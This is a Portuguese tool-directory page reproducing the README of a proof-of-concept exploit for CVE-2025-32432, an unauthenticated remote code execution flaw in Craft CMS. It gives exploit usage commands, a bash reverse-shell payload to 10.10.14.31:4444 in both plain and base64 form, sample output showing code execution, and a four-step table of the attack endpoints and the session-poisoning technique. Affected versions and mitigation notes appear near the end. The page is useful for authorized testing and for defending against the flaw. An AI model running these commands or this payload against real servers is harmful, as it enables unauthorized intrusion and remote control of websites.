Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-32432 — Exploit, POC para CVE-2025-32432, CraftCMS2Shell | Kitploit
Ferramentas/GitHubGitHub/c0gnit00/cve-2025-32432
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubc0gnit00/cve-2025-32432

CVE-2025-32432

Exploit, POC para CVE-2025-32432, CraftCMS2Shell

Ver Repositório
32há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-32432 PoC de RCE Sem Autenticação no Craft CMS

Execução Remota de Código Crítica Sem Autenticação no Craft CMS

Afetados: Craft CMS 3.x, 4.x e 5.x (até 5.6.16)

Info: Este exploit foi testado contra a máquina Orion do HackTheBox

Visão Geral

Este repositório contém um exploit de prova de conceito para o CVE-2025-32432, uma vulnerabilidade crítica de execução remota de código sem autenticação no Craft CMS. A vulnerabilidade permite que um atacante não autenticado execute código PHP arbitrário no servidor explorando o mecanismo de anexação de comportamentos do Yii2 e a instanciação de objetos PHP por meio da técnica de sobrescrita __class.

Pontuação CVSS: 10.0 (Crítico)

Recursos

  • Exploração sem autenticação — Nenhuma credencial de login necessária
  • Compatibilidade universal — Funciona no Craft CMS 3.x, 4.x e 5.x
  • Descoberta automática de ID de asset — Faz brute-force automático de IDs de asset válidos
  • Extração de token CSRF — Lida automaticamente com a proteção CSRF do Craft CMS
  • Fallback de caminho de sessão — Tenta automaticamente caminhos alternativos de sessão PHP se o primeiro falhar

Requisitos

Baixar ferramenta
root@kitploit:~
pip install requests urllib3

Início Rápido

Execução Básica de Comando

root@kitploit:~
python3 exploit.py -u http://target.com -c "id"

Shell Reversa

root@kitploit:~
# Start listener on your machine
penelope -p 4444

# base64 encode the payload
echo 'exec bash -i >& /dev/tcp/10.10.14.31/4444 0>&1' | base64


# Run exploit
python3 exploit.py -u http://orion.htb -c "echo 'ZXhlYyBiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMxLzQ0NDQgMD4mMQo=' | base64 -d | bash"

Pular força bruta de ID de Asset (se conhecido)

root@kitploit:~
python3 exploit.py -u http://target.com -c "whoami" -a 11

Usar caminho de sessão alternativo

root@kitploit:~
python3 exploit.py -u http://target.com -c "id" \
  -s "/tmp/sess_{}"

Uso

root@kitploit:~
usage: exploit.py [-h] -u URL -c COMMAND [-a ASSET_ID] [-m MAX_ASSET]
                                [-s SESSION_PATH] [-q]

CVE-2025-32432 Craft CMS Pre-Auth RCE Exploit v2

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target URL (e.g., http://target.com)
  -c, --command COMMAND
                        Command to execute
  -a, --asset-id ASSET_ID
                        Known valid asset ID (skip brute-force)
  -m, --max-asset MAX_ASSET
                        Max asset ID to brute-force (default: 300)
  -s, --session-path SESSION_PATH
                        Session file path template (default: /var/lib/php/sessions/sess_{})
  -q, --quiet           Suppress verbose output

Exemplo de Saída

root@kitploit:~
$ python3 exploit.py -u http://orion.htb -c "id"

╔══════════════════════════════════════════════════════════════╗
║  CVE-2025-32432 Craft CMS Pre-Auth RCE PoC v2              ║
║  Target: http://orion.htb                                  ║
║  Command: id                                                  ║
╚══════════════════════════════════════════════════════════════╝

[+] Stage 1: Getting session cookie and CSRF token...
[✓] Session ID: q6458g6g8njeimu59n9l65cu1e
[✓] CSRF Token: ofuxX9FLAA7gSDxLqxYtJGLZVHpPCm...
[+] Stage 2: Poisoning session file with PHP code...
[+] Poison request returned: 200
[✓] Session file poisoned
[+] Stage 3: Brute-forcing asset ID (1-300)...
[✓] Valid asset ID found: 1 (HTTP 200)
[+] Stage 4: Triggering RCE via PhpManager gadget chain...
[+] Target session file: /var/lib/php/sessions/sess_q6458g6g8njeimu59n9l65cu1e
[+] Trigger request returned: 200
[✓] COMMAND OUTPUT:
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================

Etapas do Exploit

EtapaAçãoEndpointAutenticação
1Extrair cookie de sessão + token CSRFGET /admin/loginNão
2Injetar payload PHP no arquivo de sessãoGET /index.php?p=admin/dashboard&a=<PHP>Não
3Forçar brute-force de ID de asset válidoPOST /index.php?p=admin/actions/assets/generate-transformNão
4Acionar RCE via gadget PhpManagerPOST /index.php?p=admin/actions/assets/generate-transform&cmd=<CMD>Não

Versões Afetadas

BranchAfetadasCorrigida
3.x3.0.0-RC1 – 3.9.143.9.15+
4.x4.0.0-RC1 – 4.14.144.14.15+
5.x5.0.0-RC1 – 5.6.165.6.17+

Mitigação

  1. Atualize imediatamente para a versão corrigida mais recente
  2. Monitore os logs em busca de:
    • Múltiplas requisições POST para /admin/actions/assets/generate-transform
    • Requisições GET para páginas admin com o parâmetro a= contendo código PHP
    • Presença de campos as no corpo de requisições POST
  3. Ative regras de WAF para bloquear padrões suspeitos

Créditos

  • Descoberta original: Orange Cyberdefense / SensePost
  • Post no blog: Investigando uma campanha real usando RCE no CraftCMS
  • Autor do PoC: Baseado na pesquisa da SensePost, adaptado para HTB/testes de penetração

Aviso Legal

Esta ferramenta é destinada apenas a testes de segurança autorizados e fins de pesquisa. O acesso não autorizado a sistemas de computador é ilegal. Sempre obtenha a devida autorização antes de testar.

Licença

Licença MIT - Consulte o arquivo LICENSE para obter detalhes.